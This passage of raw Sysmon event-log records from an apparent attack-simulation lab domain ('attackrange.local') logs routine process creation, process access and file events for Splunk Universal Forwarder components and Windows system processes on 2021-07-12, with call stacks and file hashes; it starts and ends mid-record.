Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.276{466BC892-F676-60EB-997D-00000000CF01}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808944Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:51.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C69F4B4817BF964C03A3AA502EC4DAFB,SHA256=2C1A762E155A383DB270D4BE97901A03EFEA170FFFEBD5D131254AE1043912A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.911{466BC892-F677-60EB-9B7D-00000000CF01}82803852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.696{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F677-60EB-9B7D-00000000CF01}8280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.696{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.696{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.696{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.696{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.696{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F677-60EB-9B7D-00000000CF01}8280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.696{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F677-60EB-9B7D-00000000CF01}8280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.682{466BC892-F677-60EB-9B7D-00000000CF01}8280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.496{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=617A93885F81C7295BEAF3AC9EDAB096,SHA256=1E3CB4A7C01DCC6D2CBC2CDA8543A30814A9A6DDFEDB7AFE29D13EB3941A2A14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.280{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=373480021CAF188AF7EA8C390A8FC1A2,SHA256=991BE16F7456F55926B09291D3C81061BA26B570B426F3CB2A4CAF62A4016C4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.280{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F8E17B0705ADBB565D140CB9A51045B,SHA256=619946971D449B60585F3A61F10D29A43D905A6959A367656C5E7CEF01826FF5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.180{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F677-60EB-9A7D-00000000CF01}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.180{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.180{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.180{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.180{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.165{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F677-60EB-9A7D-00000000CF01}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.165{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F677-60EB-9A7D-00000000CF01}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.166{466BC892-F677-60EB-9A7D-00000000CF01}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.128{466BC892-F5CF-60EB-707D-00000000CF01}1196764C:\Windows\servicing\TrustedInstaller.exe{466BC892-F5CF-60EB-717D-00000000CF01}1908C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+7d1d8|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.996{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F678-60EB-9D7D-00000000CF01}7520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.996{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.980{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.980{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.980{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.980{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F678-60EB-9D7D-00000000CF01}7520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.980{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F678-60EB-9D7D-00000000CF01}7520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.981{466BC892-F678-60EB-9D7D-00000000CF01}7520C:\Program 